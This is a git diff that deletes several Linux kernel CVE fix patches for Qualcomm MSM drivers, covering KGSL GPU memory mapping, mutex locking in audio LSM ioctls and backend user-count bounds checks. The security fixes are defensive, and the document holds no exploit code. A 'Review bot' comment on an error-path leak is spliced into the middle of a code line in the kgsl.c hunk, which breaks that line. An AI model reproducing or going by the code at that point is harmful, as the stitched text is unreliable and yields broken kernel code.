*virtaddr); - unsigned int kgsl_mmu_log_fault_addr(struct kgsl_mmu *mmu, - u64 ttbr0, uint64_t addr); -diff --git a/drivers/gpu/msm/kgsl_sharedmem.c b/drivers/gpu/msm/kgsl_sharedmem.c -index 941e4c4..7d7fec7 100644 ---- a/drivers/gpu/msm/kgsl_sharedmem.c -+++ b/drivers/gpu/msm/kgsl_sharedmem.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2002,2007-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2002,2007-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -318,12 +318,11 @@ static int kgsl_cma_alloc_secure(struct kgsl_device *device, - - static int kgsl_allocate_secure(struct kgsl_device *device, - struct kgsl_memdesc *memdesc, -- struct kgsl_pagetable *pagetable, - uint64_t size) { - int ret; - - if (MMU_FEATURE(&device->mmu, KGSL_MMU_HYP_SECURE_ALLOC)) -- ret = kgsl_sharedmem_page_alloc_user(memdesc, pagetable, size); -+ ret = kgsl_sharedmem_page_alloc_user(memdesc, size); - else - ret = kgsl_cma_alloc_secure(device, memdesc, size); - -@@ -332,7 +331,6 @@ static int kgsl_allocate_secure(struct kgsl_device *device, - - int kgsl_allocate_user(struct kgsl_device *device, - struct kgsl_memdesc *memdesc, -- struct kgsl_pagetable *pagetable, - uint64_t size, uint64_t flags) - { - int ret; -@@ -340,12 +338,11 @@ int kgsl_allocate_user(struct kgsl_device *device, - memdesc->flags = flags; - - if (kgsl_mmu_get_mmutype(device) == KGSL_MMU_TYPE_NONE) -- ret = kgsl_sharedmem_alloc_contig(device, memdesc, -- pagetable, size); -+ ret = kgsl_sharedmem_alloc_contig(device, memdesc, size); - else if (flags & KGSL_MEMFLAGS_SECURE) -- ret = kgsl_allocate_secure(device, memdesc, pagetable, size); -+ ret = kgsl_allocate_secure(device, memdesc, size); - else -- ret = kgsl_sharedmem_page_alloc_user(memdesc, pagetable, size); -+ ret = kgsl_sharedmem_page_alloc_user(memdesc, size); - - return ret; - } -@@ -637,7 +634,6 @@ static 
inline int get_page_size(size_t size, unsigned int align) - - int - kgsl_sharedmem_page_alloc_user(struct kgsl_memdesc *memdesc, -- struct kgsl_pagetable *pagetable, - uint64_t size) - { - int ret = 0; -@@ -671,7 +667,6 @@ kgsl_sharedmem_page_alloc_user(struct kgsl_memdesc *memdesc, - - len_alloc = PAGE_ALIGN(size) >> PAGE_SHIFT; - -- memdesc->pagetable = pagetable; - memdesc->ops = &kgsl_page_alloc_ops; - - /* -@@ -805,10 +800,8 @@ void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc) - if (memdesc == NULL || memdesc->size == 0) - return; - -- if (memdesc->gpuaddr) { -- kgsl_mmu_unmap(memdesc->pagetable, memdesc); -- kgsl_mmu_put_gpuaddr(memdesc->pagetable, memdesc); -- } -+ /* Make sure the memory object has been unmapped */ -+ kgsl_mmu_put_gpuaddr(memdesc); - - if (memdesc->ops && memdesc->ops->free) - memdesc->ops->free(memdesc); -@@ -988,8 +981,7 @@ void kgsl_get_memory_usage(char *name, size_t name_size, uint64_t memflags) - EXPORT_SYMBOL(kgsl_get_memory_usage); - - int kgsl_sharedmem_alloc_contig(struct kgsl_device *device, -- struct kgsl_memdesc *memdesc, -- struct kgsl_pagetable *pagetable, uint64_t size) -+ struct kgsl_memdesc *memdesc, uint64_t size) - { - int result = 0; - -@@ -998,7 +990,6 @@ int kgsl_sharedmem_alloc_contig(struct kgsl_device *device, - return -EINVAL; - - memdesc->size = size; -- memdesc->pagetable = pagetable; - memdesc->ops = &kgsl_cma_ops; - memdesc->dev = device->dev->parent; - -@@ -1089,7 +1080,6 @@ static int kgsl_cma_alloc_secure(struct kgsl_device *device, - { - struct kgsl_iommu *iommu = KGSL_IOMMU_PRIV(device); - int result = 0; -- struct kgsl_pagetable *pagetable = device->mmu.securepagetable; - size_t aligned; - - /* Align size to 1M boundaries */ -@@ -1109,7 +1099,6 @@ static int kgsl_cma_alloc_secure(struct kgsl_device *device, - memdesc->priv &= ~KGSL_MEMDESC_GUARD_PAGE; - - memdesc->size = aligned; -- memdesc->pagetable = pagetable; - memdesc->ops = &kgsl_cma_ops; - memdesc->dev = 
iommu->ctx[KGSL_IOMMU_CONTEXT_SECURE].dev; - -diff --git a/drivers/gpu/msm/kgsl_sharedmem.h b/drivers/gpu/msm/kgsl_sharedmem.h -index aae79ad..19477f5 100644 ---- a/drivers/gpu/msm/kgsl_sharedmem.h -+++ b/drivers/gpu/msm/kgsl_sharedmem.h -@@ -1,4 +1,4 @@ --/* Copyright (c) 2002,2007-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2002,2007-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -26,7 +26,7 @@ struct kgsl_process_private; - - int kgsl_sharedmem_alloc_contig(struct kgsl_device *device, - struct kgsl_memdesc *memdesc, -- struct kgsl_pagetable *pagetable, uint64_t size); -+ uint64_t size); - - void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc); - -@@ -66,13 +66,11 @@ void kgsl_sharedmem_uninit_sysfs(void); - - int kgsl_allocate_user(struct kgsl_device *device, - struct kgsl_memdesc *memdesc, -- struct kgsl_pagetable *pagetable, - uint64_t size, uint64_t flags); - - void kgsl_get_memory_usage(char *str, size_t len, uint64_t memflags); - - int kgsl_sharedmem_page_alloc_user(struct kgsl_memdesc *memdesc, -- struct kgsl_pagetable *pagetable, - uint64_t size); - - #define MEMFLAGS(_flags, _mask, _shift) \ -@@ -271,11 +269,10 @@ static inline int kgsl_allocate_global(struct kgsl_device *device, - memdesc->priv = priv; - - if ((memdesc->priv & KGSL_MEMDESC_CONTIG) != 0) -- ret = kgsl_sharedmem_alloc_contig(device, memdesc, NULL, -+ ret = kgsl_sharedmem_alloc_contig(device, memdesc, - (size_t) size); - else { -- ret = kgsl_sharedmem_page_alloc_user(memdesc, NULL, -- (size_t) size); -+ ret = kgsl_sharedmem_page_alloc_user(memdesc, (size_t) size); - if (ret == 0) - kgsl_memdesc_map(memdesc); - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-7366/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-7366/ANY/0002.patch deleted file mode 100644 index 4b2c8a54..00000000 
--- a/Patches/Linux_CVEs/CVE-2017-7366/ANY/0002.patch +++ /dev/null 
@@ -1,254 +0,0 @@ -From 7c4d5736d32f91f0cafe6cd86d00e26389970b00 Mon Sep 17 00:00:00 2001 -From: Jordan Crouse -Date: Tue, 31 May 2016 11:24:24 -0600 -Subject: msm: kgsl: Make sure USE_CPU_MAP + MAP_USER_MEM work together - -If one is mapping anonyomous user memory in the GPU with SVM enabled -we want to try to accommodate that request if possible. The memory -address was being set up correctly in the memory descriptor but -the GPU address was getting tripped up when getting mapped in the -process. This is because the memory should be treated like SVM -memory so it needs to be registered in the memory tree and the -rest of the path needs to accept the address. - -Change-Id: Ic0dedbad661143977a226d50263c26b5af579ce3 -Signed-off-by: Jordan Crouse -Signed-off-by: Sudeep Yedalapure ---- - drivers/gpu/msm/kgsl.c | 134 +++++++++++++++++++++---------------------------- - 1 file changed, 57 insertions(+), 77 deletions(-) - -diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c -index bd022f1..db3ba02 100644 ---- a/drivers/gpu/msm/kgsl.c -+++ b/drivers/gpu/msm/kgsl.c -@@ -166,9 +166,10 @@ int kgsl_memfree_find_entry(pid_t ptname, uint64_t *gpuaddr, - return 0; - } - --static void kgsl_memfree_purge(pid_t ptname, uint64_t gpuaddr, -- uint64_t size) -+static void kgsl_memfree_purge(struct kgsl_pagetable *pagetable, -+ uint64_t gpuaddr, uint64_t size) - { -+ pid_t ptname = pagetable ? pagetable->name : 0; - int i; - - if (memfree.list == NULL) -@@ -332,40 +333,22 @@ kgsl_mem_entry_destroy(struct kref *kref) - } - EXPORT_SYMBOL(kgsl_mem_entry_destroy); - --/** -- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and -- * assign it with a gpu address space before insertion -- * @process: the process that owns the memory -- * @entry: the memory entry -- * -- * @returns - 0 on succcess else error code -- * -- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address. 
-- * The assignment of gpu address and insertion into list needs to -- * happen with the memory lock held to avoid race conditions between -- * gpu address being selected and some other thread looking through the -- * rb list in search of memory based on gpuaddr -- * This function should be called with processes memory spinlock held -- */ --static int --kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process, -- struct kgsl_mem_entry *entry) -+/* Allocate a IOVA for memory objects that don't use SVM */ -+static int kgsl_mem_entry_track_gpuaddr(struct kgsl_device *device, -+ struct kgsl_process_private *process, -+ struct kgsl_mem_entry *entry) - { -- struct kgsl_pagetable *pagetable = process->pagetable; -+ struct kgsl_pagetable *pagetable; - - /* -- * If cpu=gpu map is used then caller needs to set the -- * gpu address -+ * If SVM is enabled for this object then the address needs to be -+ * assigned elsewhere - */ -- if (kgsl_memdesc_use_cpu_map(&entry->memdesc)) { -- if (!entry->memdesc.gpuaddr) -- return 0; -- } else if (entry->memdesc.gpuaddr) { -- WARN_ONCE(1, "gpuaddr assigned w/o holding memory lock\n"); -- return -EINVAL; -- } -- if (kgsl_memdesc_is_secured(&entry->memdesc)) -- pagetable = pagetable->mmu->securepagetable; -+ if (kgsl_memdesc_use_cpu_map(&entry->memdesc)) -+ return 0; -+ -+ pagetable = kgsl_memdesc_is_secured(&entry->memdesc) ? -+ device->mmu.securepagetable : process->pagetable; - - return kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc); - } -@@ -381,33 +364,25 @@ static void kgsl_mem_entry_commit_process(struct kgsl_mem_entry *entry) - spin_unlock(&entry->priv->mem_lock); - } - --/** -- * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process -- * @entry: the memory entry -- * @process: the owner process -- * -- * Attach a newly created mem_entry to its owner process so that -- * it can be found later. The mem_entry will be added to mem_idr and have -- * its 'id' field assigned. 
-- * -- * @returns - 0 on success or error code on failure. -+/* -+ * Attach the memory object to a process by (possibly) getting a GPU address and -+ * (possibly) mapping it - */ --int --kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry, -- struct kgsl_device_private *dev_priv) -+static int kgsl_mem_entry_attach_process(struct kgsl_device *device, -+ struct kgsl_process_private *process, -+ struct kgsl_mem_entry *entry) - { -- int id; -- int ret; -- struct kgsl_process_private *process = dev_priv->process_priv; -- struct kgsl_pagetable *pagetable = NULL; -+ int id, ret; - - ret = kgsl_process_private_get(process); - if (!ret) - return -EBADF; - -- ret = kgsl_mem_entry_track_gpuaddr(process, entry); -- if (ret) -- goto err_put_proc_priv; -+ ret = kgsl_mem_entry_track_gpuaddr(device, process, entry); -+ if (ret) { -+ kgsl_process_private_put(process); -+ return ret; -+ } - - idr_preload(GFP_KERNEL); - spin_lock(&process->mem_lock); -@@ -417,40 +392,33 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry, - idr_preload_end(); - - if (id < 0) { -- ret = id; -- kgsl_mmu_put_gpuaddr(&entry->memdesc); -- goto err_put_proc_priv; -+ if (!kgsl_memdesc_use_cpu_map(&entry->memdesc)) -+ kgsl_mmu_put_gpuaddr(&entry->memdesc); -+ kgsl_process_private_put(process); -+ return id; - } - - entry->id = id; - entry->priv = process; - -- /* map the memory after unlocking if gpuaddr has been assigned */ -+ /* -+ * Map the memory if a GPU address is already assigned, either through -+ * kgsl_mem_entry_track_gpuaddr() or via some other SVM process -+ */ - if (entry->memdesc.gpuaddr) { -- /* if a secured buffer map it to secure global pagetable */ -- if (kgsl_memdesc_is_secured(&entry->memdesc)) -- pagetable = process->pagetable->mmu->securepagetable; -- else -- pagetable = process->pagetable; -+ ret = kgsl_mmu_map(entry->memdesc.pagetable, &entry->memdesc); - -- entry->memdesc.pagetable = pagetable; -- ret = kgsl_mmu_map(pagetable, &entry->memdesc); - if (ret) - 
kgsl_mem_entry_detach_process(entry); - } - -- kgsl_memfree_purge(pagetable ? pagetable->name : 0, -- entry->memdesc.gpuaddr, entry->memdesc.size); -- -- return ret; -+ kgsl_memfree_purge(entry->memdesc.pagetable, entry->memdesc.gpuaddr, -+ entry->memdesc.size); - --err_put_proc_priv: -- kgsl_process_private_put(process); - return ret; - } - - /* Detach a memory entry from a process and unmap it from the MMU */ -- - static void kgsl_mem_entry_detach_process(struct kgsl_mem_entry *entry) - { - unsigned int type; -@@ -2052,10 +2020,21 @@ static int kgsl_setup_anon_useraddr(struct kgsl_pagetable *pagetable, - entry->memdesc.pagetable = pagetable; - entry->memdesc.size = (uint64_t) size; - entry->memdesc.useraddr = hostptr; -- if (kgsl_memdesc_use_cpu_map(&entry->memdesc)) -- entry->memdesc.gpuaddr = (uint64_t) entry->memdesc.useraddr; - entry->memdesc.flags |= KGSL_MEMFLAGS_USERMEM_ADDR; - -+ if (kgsl_memdesc_use_cpu_map(&entry->memdesc)) { -+ int ret; -+ -+ /* Register the address in the database */ -+ ret = kgsl_mmu_set_svm_region(pagetable, -+ (uint64_t) entry->memdesc.useraddr, (uint64_t) size); -+ -+ if (ret) -+ return ret; -+ -+ entry->memdesc.gpuaddr = (uint64_t) entry->memdesc.useraddr; -+ } -+ - return memdesc_sg_virt(&entry->memdesc, NULL); - } - -@@ -2305,7 +2284,7 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv, - - param->flags = entry->memdesc.flags; - -- ret = kgsl_mem_entry_attach_process(entry, dev_priv); -+ ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry); - if (ret) - goto unmap; - -@@ -2609,7 +2588,8 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv, - /* echo back flags */ - param->flags = (unsigned int) entry->memdesc.flags; - -- result = kgsl_mem_entry_attach_process(entry, dev_priv); -+ result = kgsl_mem_entry_attach_process(dev_priv->device, private, -+ entry); - if (result) - goto error_attach; - -@@ -3006,7 +2986,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry( - if (ret != 
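Review bot: In the kgsl_setup_anon_useraddr() hunk the new `kgsl_mmu_set_svm_region()` registration is not undone when the following `memdesc_sg_virt()` call fails; the function returns the error with the range still registered and `memdesc.gpuaddr` set. Whether the caller releases it is not visible here. The attach path in the same patch skips `kgsl_mmu_put_gpuaddr()` for CPU-mapped objects when the id allocation fails (`id < 0`), so the region may stay reserved. Capturing the result and releasing on failure would balance the error path: `ret = memdesc_sg_virt(&entry->memdesc, NULL);` then `if (ret && kgsl_memdesc_use_cpu_map(&entry->memdesc)) kgsl_mmu_put_gpuaddr(&entry->memdesc);`, with `ret` declared at function scope.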
0) - goto err; - -- ret = kgsl_mem_entry_attach_process(entry, dev_priv); -+ ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry); - if (ret != 0) { - kgsl_sharedmem_free(&entry->memdesc); - goto err; -@@ -3431,8 +3411,8 @@ static unsigned long _gpu_set_svm_region(struct kgsl_process_private *private, - return ret; - } - -- kgsl_memfree_purge(private->pagetable ? private->pagetable->name : 0, -- entry->memdesc.gpuaddr, entry->memdesc.size); -+ kgsl_memfree_purge(private->pagetable, entry->memdesc.gpuaddr, -+ entry->memdesc.size); - - return addr; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-7368/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7368/ANY/0001.patch deleted file mode 100644 index 8bcd196c..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7368/ANY/0001.patch +++ /dev/null 
@@ -1,368 +0,0 @@ -From 143ef972be1621458930ea3fc1def5ebce7b0c5d Mon Sep 17 00:00:00 2001 -From: Yeleswarapu Nagaradhesh -Date: Tue, 14 Feb 2017 14:27:56 +0530 -Subject: ASoC: msm: acquire lock in ioctl - -If two ioctls are triggered with different commands, -there is a possibility to access freed confidence level -memory. To resolve this acquire lock in ioctl. -Also release mutex lock properly in error cases. - -CRs-Fixed: 1103085 -Change-Id: I7d6b2eff21c8297e5f0755a0c141254be32f777d -Signed-off-by: Yeleswarapu Nagaradhesh ---- - sound/soc/msm/msm-cpe-lsm.c | 1 + - sound/soc/msm/qdsp6v2/msm-lsm-client.c | 93 ++++++++++++++++++++++++---------- - 2 files changed, 68 insertions(+), 26 deletions(-) - -diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c -index 7989a1e..3762e02 100644 ---- a/sound/soc/msm/msm-cpe-lsm.c -+++ b/sound/soc/msm/msm-cpe-lsm.c -@@ -1621,6 +1621,7 @@ static int msm_cpe_lsm_ioctl(struct snd_pcm_substream *substream, - switch (cmd) { - case SNDRV_LSM_REG_SND_MODEL_V2: { - struct snd_lsm_sound_model_v2 snd_model; -+ - if (copy_from_user(&snd_model, (void *)arg, - sizeof(struct snd_lsm_sound_model_v2))) { - dev_err(rtd->dev, -diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c -index d5358e3..62a4e82 100644 ---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c -+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2013-2016, Linux Foundation. All rights reserved. -+ * Copyright (c) 2013-2017, Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -84,6 +84,7 @@ struct lsm_priv { - atomic_t buf_count; - atomic_t read_abort; - wait_queue_head_t period_wait; -+ struct mutex lsm_api_lock; - int appl_cnt; - int dma_write; - }; -@@ -900,10 +901,18 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream, - case SNDRV_LSM_EVENT_STATUS: - dev_dbg(rtd->dev, "%s: Get event status\n", __func__); - atomic_set(&prtd->event_wait_stop, 0); -+ -+ /* -+ * Release the api lock before wait to allow -+ * other IOCTLs to be invoked while waiting -+ * for event -+ */ -+ mutex_unlock(&prtd->lsm_api_lock); - rc = wait_event_freezable(prtd->event_wait, - (cmpxchg(&prtd->event_avail, 1, 0) || - (xchg = atomic_cmpxchg(&prtd->event_wait_stop, - 1, 0)))); -+ mutex_lock(&prtd->lsm_api_lock); - dev_dbg(rtd->dev, "%s: wait_event_freezable %d event_wait_stop %d\n", - __func__, rc, xchg); - if (!rc && !xchg) { -@@ -1147,6 +1156,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - rtd = substream->private_data; - prtd = runtime->private_data; - -+ mutex_lock(&prtd->lsm_api_lock); -+ - switch (cmd) { - case SNDRV_LSM_EVENT_STATUS: { - struct snd_lsm_event_status *user = NULL, userarg32; -@@ -1154,7 +1165,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - if (copy_from_user(&userarg32, arg, sizeof(userarg32))) { - dev_err(rtd->dev, "%s: err copyuser ioctl %s\n", - __func__, "SNDRV_LSM_EVENT_STATUS"); -- return -EFAULT; -+ err = -EFAULT; -+ goto done; - } - - if (userarg32.payload_size > -@@ -1162,7 +1174,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - pr_err("%s: payload_size %d is invalid, max allowed = %d\n", - __func__, userarg32.payload_size, - LISTEN_MAX_STATUS_PAYLOAD_SIZE); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - size = sizeof(*user) + userarg32.payload_size; -@@ -1171,7 +1184,8 
@@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: Allocation failed event status size %d\n", - __func__, size); -- return -EFAULT; -+ err = -EFAULT; -+ goto done; - } else { - cmd = SNDRV_LSM_EVENT_STATUS; - user->payload_size = userarg32.payload_size; -@@ -1220,7 +1234,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: %s: not supported if using topology\n", - __func__, "REG_SND_MODEL_V2"); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - if (copy_from_user(&snd_modelv232, arg, -@@ -1261,7 +1276,7 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: %s: not supported if using topology\n", - __func__, "SET_PARAMS_32"); -- return -EINVAL; -+ err = -EINVAL; - } - - if (copy_from_user(&det_params32, arg, -@@ -1304,7 +1319,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: %s: not supported if not using topology\n", - __func__, "SET_MODULE_PARAMS_32"); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - if (copy_from_user(&p_data_32, arg, -@@ -1313,7 +1329,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - "%s: %s: copy_from_user failed, size = %zd\n", - __func__, "SET_MODULE_PARAMS_32", - sizeof(p_data_32)); -- return -EFAULT; -+ err = -EFAULT; -+ goto done; - } - - p_data.params = compat_ptr(p_data_32.params); -@@ -1325,7 +1342,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - "%s: %s: Invalid num_params %d\n", - __func__, "SET_MODULE_PARAMS_32", - p_data.num_params); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - if (p_data.data_size != -@@ -1334,7 +1352,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - "%s: %s: Invalid size %d\n", - __func__, "SET_MODULE_PARAMS_32", - p_data.data_size); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - p_size = sizeof(struct 
lsm_params_info_32) * -@@ -1345,7 +1364,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: no memory for params32, size = %zd\n", - __func__, p_size); -- return -ENOMEM; -+ err = -ENOMEM; -+ goto done; - } - - p_size = sizeof(struct lsm_params_info) * p_data.num_params; -@@ -1355,7 +1375,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - "%s: no memory for params, size = %zd\n", - __func__, p_size); - kfree(params32); -- return -ENOMEM; -+ err = -ENOMEM; -+ goto done; - } - - if (copy_from_user(params32, p_data.params, -@@ -1365,7 +1386,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - __func__, "params32", p_data.data_size); - kfree(params32); - kfree(params); -- return -EFAULT; -+ err = -EFAULT; -+ goto done; - } - - p_info_32 = (struct lsm_params_info_32 *) params32; -@@ -1408,6 +1430,8 @@ static int msm_lsm_ioctl_compat(struct snd_pcm_substream *substream, - err = msm_lsm_ioctl_shared(substream, cmd, arg); - break; - } -+done: -+ mutex_unlock(&prtd->lsm_api_lock); - return err; - } - #else -@@ -1432,6 +1456,7 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - prtd = runtime->private_data; - rtd = substream->private_data; - -+ mutex_lock(&prtd->lsm_api_lock); - switch (cmd) { - case SNDRV_LSM_REG_SND_MODEL_V2: { - struct snd_lsm_sound_model_v2 snd_model_v2; -@@ -1440,7 +1465,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: %s: not supported if using topology\n", - __func__, "REG_SND_MODEL_V2"); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - if (copy_from_user(&snd_model_v2, arg, sizeof(snd_model_v2))) { -@@ -1467,7 +1493,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: %s: not supported if using topology\n", - __func__, "SET_PARAMS"); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - pr_debug("%s: SNDRV_LSM_SET_PARAMS\n", __func__); -@@ 
-1488,7 +1515,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: LSM_SET_PARAMS failed, err %d\n", - __func__, err); -- return err; -+ -+ goto done; - } - - case SNDRV_LSM_SET_MODULE_PARAMS: { -@@ -1500,7 +1528,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: %s: not supported if not using topology\n", - __func__, "SET_MODULE_PARAMS"); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - if (copy_from_user(&p_data, arg, -@@ -1508,7 +1537,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: %s: copy_from_user failed, size = %zd\n", - __func__, "p_data", sizeof(p_data)); -- return -EFAULT; -+ err = -EFAULT; -+ goto done; - } - - if (p_data.num_params > LSM_PARAMS_MAX) { -@@ -1516,7 +1546,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - "%s: %s: Invalid num_params %d\n", - __func__, "SET_MODULE_PARAMS", - p_data.num_params); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - p_size = p_data.num_params * -@@ -1527,7 +1558,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - "%s: %s: Invalid size %zd\n", - __func__, "SET_MODULE_PARAMS", p_size); - -- return -EFAULT; -+ err = -EFAULT; -+ goto done; - } - - params = kzalloc(p_size, GFP_KERNEL); -@@ -1535,7 +1567,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: no memory for params\n", - __func__); -- return -ENOMEM; -+ err = -ENOMEM; -+ goto done; - } - - if (copy_from_user(params, p_data.params, -@@ -1544,7 +1577,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - "%s: %s: copy_from_user failed, size = %d\n", - __func__, "params", p_data.data_size); - kfree(params); -- return -EFAULT; -+ err = -EFAULT; -+ goto done; - } - - err = msm_lsm_process_params(substream, &p_data, params); -@@ -1564,7 +1598,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - dev_err(rtd->dev, 
- "%s: err copyuser event_status\n", - __func__); -- return -EFAULT; -+ err = -EFAULT; -+ goto done; - } - - if (userarg.payload_size > -@@ -1572,7 +1607,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - pr_err("%s: payload_size %d is invalid, max allowed = %d\n", - __func__, userarg.payload_size, - LISTEN_MAX_STATUS_PAYLOAD_SIZE); -- return -EINVAL; -+ err = -EINVAL; -+ goto done; - } - - size = sizeof(struct snd_lsm_event_status) + -@@ -1582,7 +1618,8 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - dev_err(rtd->dev, - "%s: Allocation failed event status size %d\n", - __func__, size); -- return -EFAULT; -+ err = -EFAULT; -+ goto done; - } else { - user->payload_size = userarg.payload_size; - err = msm_lsm_ioctl_shared(substream, cmd, user); -@@ -1605,12 +1642,14 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream, - if (err) - dev_err(rtd->dev, - "%s: lsmevent failed %d", __func__, err); -- return err; -+ goto done; - } - default: - err = msm_lsm_ioctl_shared(substream, cmd, arg); - break; - } -+done: -+ mutex_unlock(&prtd->lsm_api_lock); - return err; - } - -@@ -1627,6 +1666,7 @@ static int msm_lsm_open(struct snd_pcm_substream *substream) - __func__); - return -ENOMEM; - } -+ mutex_init(&prtd->lsm_api_lock); - spin_lock_init(&prtd->event_lock); - init_waitqueue_head(&prtd->event_wait); - init_waitqueue_head(&prtd->period_wait); -@@ -1776,6 +1816,7 @@ static int msm_lsm_close(struct snd_pcm_substream *substream) - kfree(prtd->event_status); - prtd->event_status = NULL; - spin_unlock_irqrestore(&prtd->event_lock, flags); -+ mutex_destroy(&prtd->lsm_api_lock); - kfree(prtd); - runtime->private_data = NULL; - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-7369/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7369/3.10/0001.patch deleted file mode 100644 index 46098299..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7369/3.10/0001.patch +++ /dev/null 
@@ -1,50 +0,0 @@
-From 75ed08a822cf378ffed0d2f177d06555bd77a006 Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Thu, 2 Mar 2017 12:13:34 +0800
-Subject: ASoC: Add backend user count checking
-
-Add backend user count checking to protect the index
-boundary.
-
-Change-Id: Ic1b61d1f7130252cc54da0b16553858714988dbd
-CRs-Fixed: 2009216
-Signed-off-by: Walter Yang
----
- sound/soc/soc-compress.c | 5 +++++
- sound/soc/soc-pcm.c | 4 ++++
- 2 files changed, 9 insertions(+)
-
-diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
-index 8902662..3b30818 100644
---- a/sound/soc/soc-compress.c
-+++ b/sound/soc/soc-compress.c
-@@ -569,6 +569,11 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
- cstream, &async_domain);
- } else {
- be_list[j++] = be;
-+ if (j == DPCM_MAX_BE_USERS) {
-+ dev_dbg(fe->dev,
-+ "ASoC: MAX backend users!\n");
-+ break;
-+ }
- }
- }
- for (i = 0; i < j; i++) {
-diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
-index 7e2b2f3..21e503c 100644
---- a/sound/soc/soc-pcm.c
-+++ b/sound/soc/soc-pcm.c
-@@ -1851,6 +1851,10 @@ void dpcm_be_dai_prepare_async(struct snd_soc_pcm_runtime *fe, int stream,
- dpcm, domain);
- } else {
- dpcm_async[i++] = dpcm;
-+ if (i == DPCM_MAX_BE_USERS) {
-+ dev_dbg(fe->dev, "ASoC: MAX backend users!\n");
-+ break;
-+ }
- }
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7369/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-7369/3.18/0002.patch
deleted file mode 100644
